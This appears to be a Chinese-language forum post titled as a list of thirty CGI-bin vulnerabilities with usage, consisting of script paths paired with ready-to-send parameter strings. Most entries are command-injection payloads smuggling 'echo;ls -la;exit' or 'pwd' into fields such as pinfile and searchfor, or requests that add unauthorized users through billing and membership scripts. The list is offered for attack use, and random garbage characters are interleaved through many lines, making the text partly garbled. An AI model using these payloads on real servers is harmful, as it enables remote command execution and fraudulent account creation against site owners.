Cgi-bin 30个漏洞＋使用方法

admin

==============================
* s2 j8 k8 n, r2 \  z; R' d
/smspass.pl
username=username&password=password

* c: Y" X; S! M8 R& h% W! t! l/index.cgi
" A8 _1 X1 d5 _7 o$ Ywei=ren&gen=command

/passmaster.cgi
; h7 e* V. H) ]8 gAction=Add&Username=Username&Password=Password

/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
) K( F# \( Y5 Q+ D  q: N' {( v
/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
" F3 A/ `+ [7 d7 }2 b8 s# D. J
/addusr.pl
* H3 N2 o) T: t0 p- X/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

/ccbill-local.asp
2 G* ~. j# b+ Z2 f: Y. l* zpost_values=username:password
+ l) s! c5 u& D+ {
- k) g4 u1 i7 \# z3 e0 ~/count.cgi
pinfile=|echo;ls -la;exit|

# J- @7 x; [$ y1 {. J/recon.cgi
/recon.cgi?search
( J  R3 }& Z7 J; ^- m0 c$ e8 T) osearchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
+ _# y7 h; e0 j; h% `vercode=username:password:dseegsow:add:amount<&30>
6 t  q. c8 B6 J. u( {5 w% Q* `  j
/af.cgi
  q0 G& A" g" {_browser_out=|echo;ls -la;exit;|

# @% V: L* F9 N; R/modify.cgi
1 ^4 g0 D* N- O/ B6 tusername=username&password=password&expire=30
% B6 I% c1 J) m9 Y5 x1 v
9 [, @% u! q) T0 w  M, S/openjournal.cgi
0 s3 H  T  `6 kedit=1&ct=2&go=|echo;ls -al;exit|
  |0 \: k% E! y, e5 R1 r( M
/gx9passwd.cgi
' z' D9 \6 u1 [3 o; e( zcmd=ADD&user=username&pass=password
! d' a% t+ ]& a4 R
4 u5 D3 y, g7 H0 U0 {. R3 r/probecontrol.cgi
command=enable&username=username&password=password

; e/ S9 ^9 h, b5 |2 w/ i3 H/recon.cgi
6 _5 T' i8 e/ d. f, \4 e8 F7 g. Ysearchoption=3&searchfor=echo;ls -la;exit
; ]+ }0 x$ }0 j! Q2 _) P2 R  p$ i
- }" l2 t' u" ]9 Q8 X# {( X- E/htadd.pl
configfile=|echo; ls -alt; exit

* h4 q: ~  P6 o' d( u$ \/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
1 y9 h/ w/ o+ b8 L& X0 }* V4 lreqtype=add&authpwd=authpwd&username=username&password=password

* h& W4 m! A2 c9 U" b/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
; r0 ?, j" V. V% [5 i' y. Z" F
% Y( k2 S1 N# M$ N/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

* m+ Z/ x3 l& N9 ^7 t/usercontrol.cgi
command=enable&username=USER&password=PASS
; K+ Q! B! P: S" X/ h( @7 f
' A8 y/ u5 o$ {/globoSALErum.cgi
8 E, \$ e  t3 Q8 o: {  Taction=ADD&seccode=seccode&login=username&password=password
( O" b- m! K- K4 M  d" X& |) Q
/addusr.pl
) ~  z  b( p9 K/ b1 b- O2 y: Suser=USER&pass=PASS&confirm=PASS
$ i) V/ ^, n; d+ h, k* F- `. [
/pincount.cgi
/ Q* @9 ^. ]. L/ e! T/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

/accountcreate.cgi
! _( h; j9 H/ |# \( V! _8 t3 _( J/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
6 l( e  e% v2 {- U" u6 H( Z
/af.cgi
6 `" y7 ?: A- n1 c/ Y/env.cgi
ADD+;echo;pwd;exit

& D) u9 a: e. s' J/ P! }/count.cgi
pinfile=|echo;pwd;exit|

/recon.cgi
! x  \2 q' T# q, r! G1 k. q( Xsearchoption=1&searchfor=|echo;ls%20-al;exit|
/ l8 h- K% Q5 M: {
/add.cgi
username=username&password=password&expire=30
' k/ Z4 \$ p- w7 X1 C# @
  o) [. D1 e" Q' U$ c" m==============================
9 H$ E6 }/ c; F3 j0 l